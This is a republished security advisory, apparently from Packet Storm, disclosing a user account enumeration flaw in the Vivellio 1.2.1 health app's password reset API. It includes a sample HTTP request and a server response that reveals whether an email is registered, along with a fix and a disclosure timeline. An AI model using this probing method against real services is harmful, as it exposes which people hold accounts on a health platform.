what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

Vivellio 1.2.1 User Account Enumeration

Vivellio 1.2.1 User Account Enumeration
Posted Feb 3, 2022
Authored by Karima Hebbal | Site trovent.io

Vivellio version 1.2.1 suffers from a user account enumeration vulnerability.

tags | exploit
SHA-256 | 9aa331eb49d5ca81107403e34cb621efd48b0ab98fde44fda72063a46ecc82e7
Download | Favorite | View

Vivellio 1.2.1 User Account Enumeration

Change Mirror Download
# Trovent Security Advisory 2108-01 #
#####################################


User account enumeration in password reset function
###################################################


Overview
########

Advisory ID: TRSA-2108-01
Advisory version: 1.0
Advisory status: Public
Advisory URL: https://trovent.io/security-advisory-2108-01
Affected product: Vivellio Android mobile application (com.netural.vivellio)
Tested versions: Vivellio 1.2.1
Vendor: blockhealth GmbH, https://www.vivellio.app
Credits: Trovent Security GmbH, Karima Hebbal


Detailed description
####################

The Vivellio mobile application is used to store health information.
Trovent Security GmbH discovered a user account enumeration vulnerability in
the password reset function of the Vivellio mobile application.
The Vivellio server API allows checking if a user with a specific email address
is registered or not.

Severity: Medium
CVSS Score: 5.3 (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N)
CWE ID: CWE-204
CVE ID: N/A


Proof of concept
################

Sample HTTP request sent with a non-registered email address:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

POST /user/reset-password HTTP/1.1
Host: app-gate.vivellio.app
Accept: application/json
Content-Type: application/json; charset=UTF-8
Content-Length: 28
Accept-Encoding: gzip, deflate
User-Agent: okhttp/3.14.1
Connection: close


{"email":"false@gmail.com"}

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~


The server response to an invalid email address:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

HTTP/1.1 404 

Cache-Control: no-cache, no-store, max-age=0, must-revalidate
Content-Type: application/json;charset=UTF-8
Date: Mon, 30 Aug 2021 11:26:59 GMT
Expires: 0
Pragma: no-cache
Server: openresty/1.15.8.1
Vary: Accept-Encoding
X-Content-Type-Options: nosniff
X-Frame-Options: DENY
X-XSS-Protection: 1; mode=block
Content-Length: 1437
Connection: Close


{"cause":null,"stackTrace":[{"classLoaderName":null,"moduleName":null,"moduleVersion":null,"methodName":"createPasswordResetProcess","fileName":"UserControllerImpl.java","lineNumber":539,"className":"ai.blockhealth.carify.user.controller.UserControllerImpl","nativeMethod":false},
{"classLoaderName":null,"moduleName":null,"moduleVersion":null,"methodName":"startPasswordReset","fileName":"UserControllerImpl.java","lineNumber":85,"className":"ai.blockhealth.carify.user.controller.UserControllerImpl","nativeMethod":false},
{"classLoaderName":null,"moduleName":null,"moduleVersion":null,"methodName":"startPasswordReset","fileName":"UserServiceImpl.java","lineNumber":52,"className":"ai.blockhealth.carify.user.service.UserServiceImpl","nativeMethod":false},
{"classLoaderName":null,"moduleName":null,"moduleVersion":null,"methodName":"startPasswordReset","fileName":"UserApi.java","lineNumber":61,"className":"ai.blockhealth.carify.user.UserApi","nativeMethod":false},
{"classLoaderName":null,"moduleName":null,"moduleVersion":null,"methodName":"doFilterInternal","fileName":"VivellioRequestLogger.java","lineNumber":56,"className":"ai.blockhealth.carify.filter.VivellioRequestLogger","nativeMethod":false}],
"message":"The email false@gmail.com could not be linked to an existing account.","suppressed":[],"localizedMessage":"The email false@gmail.com could not be linked to an existing account.","exceptionClass":"EmailNotFoundException"

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~


Solution / Workaround
#####################

Ensure the application returns a consistent message for both existent and
nonexistent accounts during the password reset process.

Fixed in Vivellio server API, verified by Trovent.


History
#######

2021-08-30: Vulnerability found & advisory created
2021-09-24: Vendor contacted
2021-09-27: Vendor replied
2021-12-18: Vendor reported that the vulnerability is fixed
2022-01-26: Trovent verified the fix of the vulnerability
2022-02-03: Advisory published
Login or Register to add favorites

File Archive:

April 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Apr 1st
    10 Files
  • 2
    Apr 2nd
    26 Files
  • 3
    Apr 3rd
    40 Files
  • 4
    Apr 4th
    6 Files
  • 5
    Apr 5th
    26 Files
  • 6
    Apr 6th
    0 Files
  • 7
    Apr 7th
    0 Files
  • 8
    Apr 8th
    22 Files
  • 9
    Apr 9th
    14 Files
  • 10
    Apr 10th
    10 Files
  • 11
    Apr 11th
    13 Files
  • 12
    Apr 12th
    14 Files
  • 13
    Apr 13th
    0 Files
  • 14
    Apr 14th
    0 Files
  • 15
    Apr 15th
    30 Files
  • 16
    Apr 16th
    10 Files
  • 17
    Apr 17th
    22 Files
  • 18
    Apr 18th
    0 Files
  • 19
    Apr 19th
    0 Files
  • 20
    Apr 20th
    0 Files
  • 21
    Apr 21st
    0 Files
  • 22
    Apr 22nd
    0 Files
  • 23
    Apr 23rd
    0 Files
  • 24
    Apr 24th
    0 Files
  • 25
    Apr 25th
    0 Files
  • 26
    Apr 26th
    0 Files
  • 27
    Apr 27th
    0 Files
  • 28
    Apr 28th
    0 Files
  • 29
    Apr 29th
    0 Files
  • 30
    Apr 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Site Links
News by Month
News Tags
Files by Month
File Tags
File Directory
About Us
History & Purpose
Contact Information
Terms of Service
Privacy Statement
Copyright Information
Services
Security Services
Hosting By
Rokasec
close